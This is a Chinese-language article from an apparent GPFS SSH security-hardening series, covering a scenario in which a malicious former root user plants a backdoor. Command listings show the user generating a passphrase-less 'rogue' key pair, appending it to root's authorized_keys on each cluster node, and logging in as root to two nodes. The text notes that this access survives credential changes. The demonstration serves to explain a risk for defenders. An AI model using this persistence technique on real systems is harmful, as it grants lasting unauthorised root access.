增强 GPFS 中 SSH 配置的安全性-注入恶意SSH秘钥
|
- UID
- 1066743
|
增强 GPFS 中 SSH 配置的安全性-注入恶意SSH秘钥
场景 3:注入恶意 SSH 加密密钥在前面的场景中,显示了如何通过使用以前为 root 用户创建的 SSH 加密密钥实现未经授权的特权访问。假设作为 GPFS 安装的先决条件之一,已经准备好让远程连接用加密密钥所需的 SSH 配置。
此场景包括恶意用户注入用户自己创建的加密密钥,以获得对 GPFS 节点 root 用户权限访问。假设,此用户以前访问节点时拥有执行该任务的 root 用户权限。
我们要做的第一步是创建一对加密密钥。可以在其中一个 GPFS 节点上的用户个人计算机上或从其他非 GPFS 服务器创建密钥。必须运行 ssh-keygen 命令,如下面的清单所示(本示例使用了默认 GPFS 安装所要求的空密码):
清单 7. 恶意 SSH 加密密钥的创建1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| $ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/left173/.ssh/id_rsa):./rogue_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./rogue_rsa
Your public key has been saved in ./rogue_rsa.pub
The key fingerprint is:
c2:ae:ac:af:dd:71:35:35:39:c1:07:b2:f8:cc:71:82 left173@pc2604
The key's randomart image is:
+--[RSA 2048]----+
| ..o. |
| o o.o.|
| E + *. |
| .+ = o |
| o S * |
| .... |
| o . |
| o o o |
| o+= . |
+----------------+
$
|
下一步是在每个 GPFS 节点上安装恶意公共密钥 rogue_rsa.pub。它被传输或复制到每个 GPFS 节点上的 /root/.ssh 目录。然后,必须将它附加到 authorized_keys 文件的末尾,如下面的清单所示。
清单 8. 在 GPFS 节点上注入恶意 SSH 公钥1
2
3
4
5
| # pwd
/home/root/.ssh
# cat rogue_id_rsa.pub >> authorized_keys
# rm rogue_id_rsa.pub
#
|
authorized_keys 文件维护了一个允许用来连接服务器的公共加密密钥的列表。一般情况下,这是在 GPFS 节点之间与试图连接到服务器的任何人建立信任关系的地方。
完成这些步骤后,恶意用户准备以 root 用户的身份进行登录,如下面的清单所示。
清单 9. 使用恶意加密密钥连接到节点 A1
2
3
4
5
6
7
8
| $ eval `ssh-agent`
Agent pid 25036
$ ssh-add rogue_id_rsa
Identity added: rogue_id_rsa (rogue_id_rsa)
$ ssh -l root 172.19.230.35
Last login:Thu Aug 15 14:15:00 2013 from gpfsnodeb
=== Welcome to GPFS Node A
#
|
清单 10. 使用恶意加密密钥连接到节点 B1
2
3
4
5
6
7
8
| $ eval `ssh-agent`
Agent pid 25140
$ ssh-add rogue_id_rsa
Identity added: rogue_id_rsa (rogue_id_rsa)
$ ssh -l root 172.19.230.36
Last login:Thu Aug 15 14:15:00 2013 from gpfsnodea
=== Welcome to GPFS Node B
#
|
通过使用这对新的恶意密钥, root 用户密码或其加密密钥是否变更已不再重要,现在,无论 root 用户的访问凭据如何变化,恶意用户都可以进入服务器。 |
|
|
|
|
|
